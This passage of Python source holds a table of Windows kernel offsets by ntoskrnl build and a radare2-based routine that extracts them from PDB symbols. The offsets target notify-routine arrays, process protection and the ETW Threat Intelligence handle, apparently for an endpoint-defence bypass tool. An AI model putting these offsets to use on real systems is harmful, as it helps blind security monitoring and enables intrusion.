            "ntoskrnl_17134-885.exe": ["3e4f30", "3e4b30", "3e4d30", "6ca", "3a1f68", "20", "50"],
            "ntoskrnl_17134-915.exe": ["3e4d70", "3e4f70", "3e4b70", "6ca", "3a1fa8", "20", "50"],
            "ntoskrnl_17134-950.exe": ["3e4d70", "3e4f70", "3e4b70", "6ca", "3a1fa8", "20", "50"],
            "ntoskrnl_17134-982.exe": ["3e4f30", "3e4b30", "3e4d30", "6ca", "3a1fd0", "20", "50"],
            "ntoskrnl_17763-1.exe": ["45c4b0", "45c0b0", "45c2b0", "6ca", "40f038", "20", "50"],
            "ntoskrnl_17763-1007.exe": ["4d8c30", "4d8830", "4d8a30", "6ca", "4096a0", "20", "50"],
            "ntoskrnl_17763-1039.exe": ["4d8b30", "4d8d30", "4d8930", "6ca", "409698", "20", "50"],
            "ntoskrnl_17763-107.exe": ["45c430", "45c030", "45c230", "6ca", "40f018", "20", "50"],
            "ntoskrnl_17763-1098.exe": ["4d9d30", "4d9930", "4d9b30", "6ca", "40a670", "20", "60"],
            "ntoskrnl_17763-1131.exe": ["4d9af0", "4d9cf0", "4d98f0", "6ca", "40a678", "20", "60"],
            "ntoskrnl_17763-1158.exe": ["4d9af0", "4d9cf0", "4d98f0", "6ca", "40a678", "20", "60"],
            "ntoskrnl_17763-1192.exe": ["4d9d30", "4d9930", "4d9b30", "6ca", "40a670", "20", "60"],
            "ntoskrnl_17763-1217.exe": ["4d9d30", "4d9930", "4d9b30", "6ca", "40a670", "20", "60"],
            "ntoskrnl_17763-1282.exe": ["4d9d70", "4d9970", "4d9b70", "6ca", "40a6b0", "20", "60"],
            "ntoskrnl_17763-1294.exe": ["4d9d70", "4d9970", "4d9b70", "6ca", "40a6b0", "20", "60"],
            "ntoskrnl_17763-1339.exe": ["4d9d70", "4d9970", "4d9b70", "6ca", "40a6b0", "20", "60"],
            "ntoskrnl_17763-134.exe": ["45c430", "45c030", "45c230", "6ca", "40efd8", "20", "50"],
            "ntoskrnl_17763-1369.exe": ["4d9d70", "4d9970", "4d9b70", "6ca", "40a6b0", "20", "60"],
            "ntoskrnl_17763-1397.exe": ["4d9bf0", "4d97f0", "4d99f0", "6ca", "40a6c0", "20", "60"],
            "ntoskrnl_17763-1432.exe": ["4d7b30", "4d7d30", "4d7930", "6ca", "408698", "20", "60"],
            "ntoskrnl_17763-1457.exe": ["4d7b30", "4d7d30", "4d7930", "6ca", "408698", "20", "60"],
            "ntoskrnl_17763-1490.exe": ["4d5b70", "4d5d70", "4d5970", "6ca", "4066d8", "20", "60"],
            "ntoskrnl_17763-1518.exe": ["4d5b30", "4d5d30", "4d5930", "6ca", "406698", "20", "60"],
            "ntoskrnl_17763-1554.exe": ["4d5cf0", "4d58f0", "4d5af0", "6ca", "406630", "20", "60"],
            "ntoskrnl_17763-1577.exe": ["4d5cf0", "4d58f0", "4d5af0", "6ca", "406630", "20", "60"],
            "ntoskrnl_17763-1613.exe": ["4d5cf0", "4d58f0", "4d5af0", "6ca", "406630", "20", "60"],
            "ntoskrnl_17763-1637.exe": ["4d5cf0", "4d58f0", "4d5af0", "6ca", "406630", "20", "60"],
            "ntoskrnl_17763-168.exe": ["4dad70", "4da970", "4dab70", "6ca", "40b078", "20", "50"],
            "ntoskrnl_17763-1697.exe": ["4d5cf0", "4d58f0", "4d5af0", "6ca", "406630", "20", "60"],
            "ntoskrnl_17763-1728.exe": ["4d5cf0", "4d58f0", "4d5af0", "6ca", "406630", "20", "60"],
            "ntoskrnl_17763-1757.exe": ["4d5b70", "4d5d70", "4d5970", "6ca", "4066d8", "20", "60"],
            "ntoskrnl_17763-1790.exe": ["4d5b70", "4d5d70", "4d5970", "6ca", "4066d8", "20", "60"],
            "ntoskrnl_17763-1817.exe": ["4d5b70", "4d5d70", "4d5970", "6ca", "4066d8", "20", "60"],
            "ntoskrnl_17763-1821.exe": ["4d5b70", "4d5d70", "4d5970", "6ca", "4066d8", "20", "60"],
            "ntoskrnl_17763-1823.exe": ["4d5b70", "4d5d70", "4d5970", "6ca", "4066d8", "20", "60"],
            "ntoskrnl_17763-1852.exe": ["4d5bf0", "4d57f0", "4d59f0", "6ca", "4066c0", "20", "60"],
            "ntoskrnl_17763-1879.exe": ["4d5bf0", "4d57f0", "4d59f0", "6ca", "4066c0", "20", "60"],
            "ntoskrnl_17763-1911.exe": ["4d6870", "4d6a70", "4d6670", "6ca", "407498", "20", "60"],
            "ntoskrnl_17763-1935.exe": ["4d6870", "4d6a70", "4d6670", "6ca", "407498", "20", "60"],
            "ntoskrnl_17763-194.exe": ["4d9d70", "4d9970", "4d9b70", "6ca", "40a038", "20", "50"],
            "ntoskrnl_17763-195.exe": ["4d9d70", "4d9970", "4d9b70", "6ca", "40a038", "20", "50"],
            "ntoskrnl_17763-1971.exe": ["4d6bb0", "4d67b0", "4d69b0", "6ca", "407498", "20", "60"],
            "ntoskrnl_17763-1999.exe": ["4d6bb0", "4d67b0", "4d69b0", "6ca", "407498", "20", "60"],
            "ntoskrnl_17763-2028.exe": ["4d67b0", "4d69b0", "4d65b0", "6ca", "407418", "20", "60"],
            "ntoskrnl_17763-2029.exe": ["4d67b0", "4d69b0", "4d65b0", "6ca", "407418", "20", "60"],
            "ntoskrnl_17763-2061.exe": ["4d58f0", "4d5af0", "4d56f0", "6ca", "406430", "20", "60"],
            "ntoskrnl_17763-2090.exe": ["4d5930", "4d5b30", "4d5730", "6ca", "406470", "20", "60"],
            "ntoskrnl_17763-2114.exe": ["4d5930", "4d5b30", "4d5730", "6ca", "406470", "20", "60"],
            "ntoskrnl_17763-2145.exe": ["4d68b0", "4d6ab0", "4d66b0", "6ca", "407480", "20", "60"],
            "ntoskrnl_17763-2183.exe": ["4d68b0", "4d6ab0", "4d66b0", "6ca", "407480", "20", "60"],
            "ntoskrnl_17763-253.exe": ["4d9d70", "4d9970", "4d9b70", "6ca", "40a038", "20", "50"],
            "ntoskrnl_17763-292.exe": ["4daaf0", "4dacf0", "4da8f0", "6ca", "40b078", "20", "50"],
            "ntoskrnl_17763-316.exe": ["4daaf0", "4dacf0", "4da8f0", "6ca", "40b078", "20", "50"],
            "ntoskrnl_17763-348.exe": ["4dabb0", "4da7b0", "4da9b0", "6ca", "40afb8", "20", "50"],
            "ntoskrnl_17763-379.exe": ["4dabf0", "4da7f0", "4da9f0", "6ca", "40aff8", "20", "50"],
            "ntoskrnl_17763-404.exe": ["4dad70", "4da970", "4dab70", "6ca", "40b718", "20", "50"],
            "ntoskrnl_17763-437.exe": ["4dad70", "4da970", "4dab70", "6ca", "40b718", "20", "50"],
            "ntoskrnl_17763-439.exe": ["4dad70", "4da970", "4dab70", "6ca", "40b718", "20", "50"],
            "ntoskrnl_17763-475.exe": ["4daaf0", "4dacf0", "4da8f0", "6ca", "40b730", "20", "50"],
            "ntoskrnl_17763-503.exe": ["4da9b0", "4dabb0", "4da7b0", "6ca", "40b598", "20", "50"],
            "ntoskrnl_17763-504.exe": ["4da9b0", "4dabb0", "4da7b0", "6ca", "40b598", "20", "50"],
            "ntoskrnl_17763-529.exe": ["4da9b0", "4dabb0", "4da7b0", "6ca", "40b598", "20", "50"],
            "ntoskrnl_17763-55.exe": ["45c4f0", "45c0f0", "45c2f0", "6ca", "40f098", "20", "50"],
            "ntoskrnl_17763-557.exe": ["4da9b0", "4dabb0", "4da7b0", "6ca", "40b598", "20", "50"],
            "ntoskrnl_17763-593.exe": ["4dac70", "4da870", "4daa70", "6ca", "40b610", "20", "50"],
            "ntoskrnl_17763-615.exe": ["4dac70", "4da870", "4daa70", "6ca", "40b610", "20", "50"],
            "ntoskrnl_17763-652.exe": ["4dabf0", "4da7f0", "4da9f0", "6ca", "40b5f0", "20", "50"],
            "ntoskrnl_17763-678.exe": ["4dac30", "4da830", "4daa30", "6ca", "40b610", "20", "50"],
            "ntoskrnl_17763-719.exe": ["4daa30", "4dac30", "4da830", "6ca", "40b658", "20", "50"],
            "ntoskrnl_17763-737.exe": ["4da9f0", "4dabf0", "4da7f0", "6ca", "40b5d8", "20", "50"],
            "ntoskrnl_17763-771.exe": ["4dac70", "4da870", "4daa70", "6ca", "40b630", "20", "50"],
            "ntoskrnl_17763-802.exe": ["4dacb0", "4da8b0", "4daab0", "6ca", "40b6c0", "20", "50"],
            "ntoskrnl_17763-831.exe": ["4d8c70", "4d8870", "4d8a70", "6ca", "409610", "20", "50"],
            "ntoskrnl_17763-864.exe": ["4d8b70", "4d8d70", "4d8970", "6ca", "409698", "20", "50"],
            "ntoskrnl_17763-914.exe": ["4d8b70", "4d8d70", "4d8970", "6ca", "409698", "20", "50"],
            "ntoskrnl_17763-973.exe": ["4d8b70", "4d8d70", "4d8970", "6ca", "409698", "20", "50"],
            "ntoskrnl_18362-1016.exe": ["505fa0", "505ba0", "505da0", "6fa", "434bf8", "20", "60"],
            "ntoskrnl_18362-1049.exe": ["503fe0", "503be0", "503de0", "6fa", "432c38", "20", "60"],
            "ntoskrnl_18362-1082.exe": ["503fa0", "503ba0", "503da0", "6fa", "432bf8", "20", "60"],
            "ntoskrnl_18362-1110.exe": ["503fa0", "503ba0", "503da0", "6fa", "432c18", "20", "60"],
            "ntoskrnl_18362-1139.exe": ["5040a0", "503ca0", "503ea0", "6fa", "432c98", "20", "60"],
            "ntoskrnl_18362-116.exe": ["500de0", "5009e0", "500be0", "6fa", "42fa48", "20", "50"],
            "ntoskrnl_18362-1171.exe": ["5040a0", "503ca0", "503ea0", "6fa", "432c90", "20", "60"],
            "ntoskrnl_18362-1198.exe": ["5040a0", "503ca0", "503ea0", "6fa", "432c90", "20", "60"],
            "ntoskrnl_18362-1237.exe": ["5040a0", "503ca0", "503ea0", "6fa", "432c90", "20", "60"],
            "ntoskrnl_18362-1256.exe": ["5040a0", "503ca0", "503ea0", "6fa", "432c90", "20", "60"],
            "ntoskrnl_18362-1316.exe": ["5040a0", "503ca0", "503ea0", "6fa", "432c90", "20", "60"],
            "ntoskrnl_18362-1350.exe": ["503b60", "503d60", "503960", "6fa", "432bf8", "20", "60"],
            "ntoskrnl_18362-1377.exe": ["503da0", "5039a0", "503ba0", "6fa", "432c38", "20", "60"],
            "ntoskrnl_18362-1379.exe": ["503da0", "5039a0", "503ba0", "6fa", "432c38", "20", "60"],
            "ntoskrnl_18362-1411.exe": ["503de0", "5039e0", "503be0", "6fa", "432c38", "20", "60"],
            "ntoskrnl_18362-1440.exe": ["503da0", "5039a0", "503ba0", "6fa", "432c38", "20", "60"],
            "ntoskrnl_18362-1441.exe": ["503da0", "5039a0", "503ba0", "6fa", "432c38", "20", "60"],
            "ntoskrnl_18362-145.exe": ["500de0", "5009e0", "500be0", "6fa", "42f9e8", "20", "50"],
            "ntoskrnl_18362-1474.exe": ["503ba0", "503da0", "5039a0", "6fa", "432c38", "20", "60"],
            "ntoskrnl_18362-1500.exe": ["503b60", "503d60", "503960", "6fa", "432c18", "20", "60"],
            "ntoskrnl_18362-1533.exe": ["503e20", "503a20", "503c20", "6fa", "432c78", "20", "60"],
            "ntoskrnl_18362-1556.exe": ["503e20", "503a20", "503c20", "6fa", "432c78", "20", "60"],
            "ntoskrnl_18362-1621.exe": ["503e20", "503a20", "503c20", "6fa", "432c78", "20", "60"],
            "ntoskrnl_18362-1679.exe": ["502da0", "5029a0", "502ba0", "6fa", "431bf8", "20", "60"],
            "ntoskrnl_18362-1734.exe": ["503de0", "5039e0", "503be0", "6fa", "432c38", "20", "60"],
            "ntoskrnl_18362-1801.exe": ["503ce0", "503ee0", "503ae0", "6fa", "432c38", "20", "60"],
            "ntoskrnl_18362-207.exe": ["500de0", "5009e0", "500be0", "6fa", "42fa48", "20", "50"],
            "ntoskrnl_18362-239.exe": ["500de0", "5009e0", "500be0", "6fa", "42fa48", "20", "50"],
            "ntoskrnl_18362-267.exe": ["503f60", "503b60", "503d60", "6fa", "432c60", "20", "50"],
            "ntoskrnl_18362-295.exe": ["503fa0", "503ba0", "503da0", "6fa", "432c48", "20", "50"],
            "ntoskrnl_18362-30.exe": ["500d60", "500960", "500b60", "6fa", "42fa40", "20", "50"],
            "ntoskrnl_18362-329.exe": ["504ee0", "5050e0", "504ce0", "6fa", "433c28", "20", "50"],
            "ntoskrnl_18362-356.exe": ["505060", "504c60", "504e60", "6fa", "433c90", "20", "50"],
            "ntoskrnl_18362-357.exe": ["505060", "504c60", "504e60", "6fa", "433c90", "20", "50"],
            "ntoskrnl_18362-387.exe": ["505fe0", "505be0", "505de0", "6fa", "434c38", "20", "50"],
            "ntoskrnl_18362-388.exe": ["505fe0", "505be0", "505de0", "6fa", "434c38", "20", "50"],
            "ntoskrnl_18362-418.exe": ["505ee0", "5060e0", "505ce0", "6fa", "434c58", "20", "50"],
            "ntoskrnl_18362-449.exe": ["505da0", "505fa0", "505ba0", "6fa", "434c58", "20", "50"],
            "ntoskrnl_18362-476.exe": ["506060", "505c60", "505e60", "6fa", "434c78", "20", "50"],
            "ntoskrnl_18362-535.exe": ["506020", "505c20", "505e20", "6fa", "434c78", "20", "50"],
            "ntoskrnl_18362-592.exe": ["506060", "505c60", "505e60", "6fa", "434c80", "20", "50"],
            "ntoskrnl_18362-628.exe": ["506060", "505c60", "505e60", "6fa", "434c78", "20", "50"],
            "ntoskrnl_18362-657.exe": ["505e60", "506060", "505c60", "6fa", "434c78", "20", "50"],
            "ntoskrnl_18362-693.exe": ["505de0", "505fe0", "505be0", "6fa", "434c38", "20", "60"],
            "ntoskrnl_18362-719.exe": ["505e20", "506020", "505c20", "6fa", "434c78", "20", "60"],
            "ntoskrnl_18362-720.exe": ["505e20", "506020", "505c20", "6fa", "434c78", "20", "60"],
            "ntoskrnl_18362-752.exe": ["505ea0", "5060a0", "505ca0", "6fa", "434c58", "20", "60"],
            "ntoskrnl_18362-753.exe": ["505ea0", "5060a0", "505ca0", "6fa", "434c58", "20", "60"],
            "ntoskrnl_18362-778.exe": ["505e60", "506060", "505c60", "6fa", "434c70", "20", "60"],
            "ntoskrnl_18362-815.exe": ["505e60", "506060", "505c60", "6fa", "434c70", "20", "60"],
            "ntoskrnl_18362-836.exe": ["505ea0", "5060a0", "505ca0", "6fa", "434c58", "20", "60"],
            "ntoskrnl_18362-900.exe": ["505ea0", "5060a0", "505ca0", "6fa", "434c78", "20", "60"],
            "ntoskrnl_18362-904.exe": ["505ea0", "5060a0", "505ca0", "6fa", "434c78", "20", "60"],
            "ntoskrnl_18362-959.exe": ["505ea0", "5060a0", "505ca0", "6fa", "434cb8", "20", "60"],
            "ntoskrnl_18362-997.exe": ["505e60", "506060", "505c60", "6fa", "434c78", "20", "60"],
            "ntoskrnl_19041-1023.exe": ["cec460", "cec260", "cec060", "87a", "c19db8", "20", "60"],
            "ntoskrnl_19041-1052.exe": ["cebfe0", "cec3e0", "cec1e0", "87a", "c19790", "20", "60"],
            "ntoskrnl_19041-1055.exe": ["cec020", "cec420", "cec220", "87a", "c19790", "20", "60"],
            "ntoskrnl_19041-1081.exe": ["cec1e0", "cebfe0", "cec3e0", "87a", "c19758", "20", "60"],
            "ntoskrnl_19041-1082.exe": ["cec420", "cec220", "cec020", "87a", "c19758", "20", "60"],
            "ntoskrnl_19041-1083.exe": ["cec420", "cec220", "cec020", "87a", "c19758", "20", "60"],
            "ntoskrnl_19041-1110.exe": ["cec120", "cebf20", "cec320", "87a", "c197f8", "20", "60"],
            "ntoskrnl_19041-1151.exe": ["cec320", "cec120", "cebf20", "87a", "c197c0", "20", "60"],
            "ntoskrnl_19041-1165.exe": ["cec2e0", "cec0e0", "cebee0", "87a", "c197a0", "20", "60"],
            "ntoskrnl_19041-1202.exe": ["cec320", "cec120", "cebf20", "87a", "c197d0", "20", "60"],
            "ntoskrnl_19041-1237.exe": ["cec320", "cec120", "cebf20", "87a", "c197d0", "20", "60"],
            "ntoskrnl_19041-1266.exe": ["cec3a0", "cec1a0", "cebfa0", "87a", "c19770", "20", "60"],
            "ntoskrnl_19041-1288.exe": ["cec1a0", "cebfa0", "cec3a0", "87a", "c19790", "20", "60"],
            "ntoskrnl_19041-264.exe": ["cec060", "cec260", "cebe60", "87a", "c19858", "20", "60"],
            "ntoskrnl_19041-329.exe": ["cec320", "cebf20", "cec120", "87a", "c19898", "20", "60"],
            "ntoskrnl_19041-331.exe": ["cec320", "cebf20", "cec120", "87a", "c19898", "20", "60"],
            "ntoskrnl_19041-388.exe": ["cec3a0", "cebfa0", "cec1a0", "87a", "c19898", "20", "60"],
            "ntoskrnl_19041-423.exe": ["cec160", "cec360", "cebf60", "87a", "c198b8", "20", "60"],
            "ntoskrnl_19041-450.exe": ["cec320", "cebf20", "cec120", "87a", "c198b8", "20", "60"],
            "ntoskrnl_19041-488.exe": ["cec220", "cec420", "cec020", "87a", "c19918", "20", "60"],
            "ntoskrnl_19041-508.exe": ["cec3a0", "cebfa0", "cec1a0", "87a", "c19898", "20", "60"],
            "ntoskrnl_19041-546.exe": ["cec420", "cec020", "cec220", "87a", "c19938", "20", "60"],
            "ntoskrnl_19041-572.exe": ["cec420", "cec020", "cec220", "87a", "c19938", "20", "60"],
            "ntoskrnl_19041-610.exe": ["cec220", "cec420", "cec020", "87a", "c19978", "20", "60"],
            "ntoskrnl_19041-630.exe": ["cec220", "cec420", "cec020", "87a", "c19978", "20", "60"],
            "ntoskrnl_19041-631.exe": ["cec220", "cec420", "cec020", "87a", "c19978", "20", "60"],
            "ntoskrnl_19041-662.exe": ["cec3a0", "cec1a0", "cebfa0", "87a", "c198f8", "20", "60"],
            "ntoskrnl_19041-685.exe": ["cec3a0", "cec1a0", "cebfa0", "87a", "c198f8", "20", "60"],
            "ntoskrnl_19041-746.exe": ["cebfe0", "cec3e0", "cec1e0", "87a", "c198f8", "20", "60"],
            "ntoskrnl_19041-789.exe": ["cec220", "cec620", "cec420", "87a", "c19998", "20", "60"],
            "ntoskrnl_19041-804.exe": ["cec420", "cec220", "cec020", "87a", "c19918", "20", "60"],
            "ntoskrnl_19041-844.exe": ["cec660", "cec460", "cec260", "87a", "c19fa8", "20", "60"],
            "ntoskrnl_19041-867.exe": ["cec1e0", "cec5e0", "cec3e0", "87a", "c19fa8", "20", "60"],
            "ntoskrnl_19041-868.exe": ["cec1e0", "cec5e0", "cec3e0", "87a", "c19fa8", "20", "60"],
            "ntoskrnl_19041-870.exe": ["cec1e0", "cec5e0", "cec3e0", "87a", "c19fa8", "20", "60"],
            "ntoskrnl_19041-906.exe": ["cec5e0", "cec3e0", "cec1e0", "87a", "c199d0", "20", "60"],
            "ntoskrnl_19041-928.exe": ["cec520", "cec320", "cec120", "87a", "c19950", "20", "60"],
            "ntoskrnl_19041-964.exe": ["cec0e0", "cebee0", "cec2e0", "87a", "c19d38", "20", "60"],
            "ntoskrnl_19041-985.exe": ["cec360", "cec160", "cebf60", "87a", "c19d78", "20", "60"],
            "ntoskrnl_22000-194.exe": ["cf5f40", "cf5d40", "cf6140", "87a", "c15d20", "20", "60"],
            "ntoskrnl_22000-258.exe": ["cf5f40", "cf5d40", "cf6140", "87a", "c15d20", "20", "60"],
            "ntoskrnl_22000-282.exe": ["cf5f00", "cf5d00", "cf6100", "87a", "c163d0", "20", "60"],
            "ntoskrnl_19041-1387.exe": ["cec1a0", "cec3a0", "cebfa0", "87a", "c197a0", "20", "60"],
            "ntoskrnl_22000-318.exe": ["cf5f00", "cf5d00", "cf6100", "87a", "c163d0", "20", "60"],
            "ntoskrnl_22000-348.exe": ["cf5e00", "cf6200", "cf6000", "87a", "c15d40", "20", "60"],
            "ntoskrnl_14393-4770.exe": ["339e60", "339c60", "339a60", "6ca", "0", "20", "50"],
            "ntoskrnl_19041-1348.exe": ["cec4e0", "cec2e0", "cec0e0", "87a", "c197c0", "20", "60"]
        }
        try:
            full_version = self.get_file_version(input_file)
            if not full_version:
                logging.error(f'[!] ERROR : failed to extract version from {input_file}.')
                return None

            # Checks if the image version is already present in the CSV
            imageVersion = f'ntoskrnl_{full_version[2]}-{full_version[3]}.exe'

            if imageVersion in known_offsets:
                return f'{imageVersion},{",".join(known_offsets[imageVersion])}\n'

            # download the PDB if needed
            self.run(["r2", "-c", "idpd", "-qq", input_file], capture_output=True)
            r = self.run(["r2", "-c", "idpi", "-qq", '-B', '0', input_file], capture_output=True)
            all_symbols_info = [line.strip() for line in r.stdout.decode().splitlines()]
            symbols = [("PspCreateProcessNotifyRoutine", self.get_symbol_offset),
                       ("PspCreateThreadNotifyRoutine", self.get_symbol_offset),
                       ("PspLoadImageNotifyRoutine", self.get_symbol_offset),
                       ('_PS_PROTECTION Protection', self.get_field_offset),
                       ("EtwThreatIntProvRegHandle", self.get_symbol_offset),
                       ('_ETW_GUID_ENTRY* GuidEntry', self.get_field_offset),
                       ('_TRACE_ENABLE_INFO ProviderEnableInfo', self.get_field_offset)]
            symbols_values = list()
            for symbol_name, get_offset in symbols:
                symbol_value = get_offset(all_symbols_info, symbol_name)
                symbols_values.append(symbol_value)
            if "R2_CURL" not in os.environ and all(val == 0 for val in symbols_values):
                logging.warning("Radare2 may have trouble to download PDB files. R2_CURL=1 environement variable has been set. Trying again.")
                os.environ["R2_CURL"] = "1"
                self.extractOffsets(input_file)

            return f'{imageVersion},{",".join(hex(val).replace("0x", "") for val in symbols_values)}\n'
        except Exception as e:
            return None

    def get_offsets(self, ntoskrnl_path):
        try:
            output = self.run(["r2", "-v"], capture_output=True).stdout.decode()
        except Exception as e:
            if "No such file or directory" in str(e):
                logging.warning("'r2' command is not in path. Automatic offsets extraction is not possible.")
            else:
                logging.warning("Unexpected error while running Radare2")
            return None
        ma, me, mi = map(int, output.splitlines()[0].split(" ")[1].split("."))
        if (ma, me, mi) < (5, 0, 0):
            logging.error("This feature has been tested with radare2 5.0.0 (works) and 4.3.1 (does NOT work)")
            return None

        try:
            self.run(["cabextract", "-v"], check=True, capture_output=True)
        except (subprocess.CalledProcessError, FileNotFoundError):
            logging.error("Radare2 needs 'cabextract' package to be installed to work with PDB")
            return None
        
        output_content = 'ntoskrnlVersion,PspCreateProcessNotifyRoutineOffset,PspCreateThreadNotifyRoutineOffset,PspLoadImageNotifyRoutineOffset,_PS_PROTECTIONOffset,EtwThreatIntProvRegHandleOffset,EtwRegEntry_GuidEntryOffset,EtwGuidEntry_ProviderEnableInfoOffset\n'

        ret = self.extractOffsets(ntoskrnl_path)
        return ret if not ret else output_content + ret
